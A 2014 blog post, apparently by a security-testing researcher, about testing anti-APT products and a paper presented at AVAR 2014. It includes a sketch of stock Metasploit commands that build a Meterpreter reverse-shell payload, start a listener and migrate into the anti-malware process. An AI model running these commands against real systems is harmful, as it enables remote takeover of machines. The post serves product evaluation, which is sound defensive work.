Tuesday, 25 November 2014
When security products make incredible claims, we should make strong efforts to challenge and, where possible, validate those claims.
Over the past year and a half I have discussed testing with a range of vendors, testers and potential customers of such products. These discussions have varied from very positive to extremely defensive and illogical on the part of some vendors.
Put it this way: we have some anti-APT kit in the lab ready for such a test, but equipment from one or two important vendors remains elusive, to say the least.
Such testing has also been a regular point of debate at the Anti-Malware Testing Standards Organization, of which I am currently the Chair, and so two AMTSO colleagues (Richard Ford, Florida Institute of Technology and Gabor Szappanos, Sophos) joined me to write a paper called "Effectively testing APT defences".
Gabor and I presented this at the AVAR 2014 conference in Sydney, on the 12th - 14th November 2014.
The paper examines some of the problems (real and merely perceived) that surround testing such technologies, and questions the definition of the term "APT" in a constructive way. It also walks the reader through an example of a targeted attack and notes where certain types of testing would be deficient when using such an attack as a test case.
In the presentation, but not the paper, I also demonstrated how a 'baseline' set of tests, using unmodified Metasploit-based attacks, made mincemeat of some well-known anti-malware products. One enterprise solution stopped four out of 25 threats. We were able to obtain reverse shells in 21 cases and, just as an experiment, migrated into the anti-malware agent's own process.
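For readers unfamiliar with what an "unmodified Metasploit-based attack" looks like, a baseline of this kind can be run with stock Metasploit commands along the following lines. This is an illustrative sketch only: the IP address, port, payload choice and process ID are placeholders, not the configuration we actually used in the tests.

```
# Generate an unmodified executable payload (no encoding, no obfuscation)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o baseline.exe

# In msfconsole, start a listener for the reverse shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

# Once a Meterpreter session opens on the target, list the running
# processes and migrate into one of them (in our experiment, the
# anti-malware agent's own process)
ps
migrate <pid>
```

The point of leaving the payload entirely unmodified is that it represents the lowest rung of attacker capability; any product claiming to stop advanced targeted attacks should handle this without difficulty.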
This basic test demonstrated that a range of tools, tactics and techniques could be used to test different levels of protection from actors ranging from 'zero' (almost no skill/resources) to 'Neo' (effectively unlimited skills/resources).
Not every tester is capable of 'Neo' testing and some may not wish to conduct 'zero' testing, but as long as the report explains which approaches were taken, and why, it is hard to understand why an anti-APT vendor would object to tests that could be considered "too easy."
While the paper does not provide a single, ultimate methodology for anti-APT testing, I believe that the document does outline some valid approaches, none of which is "do not test!"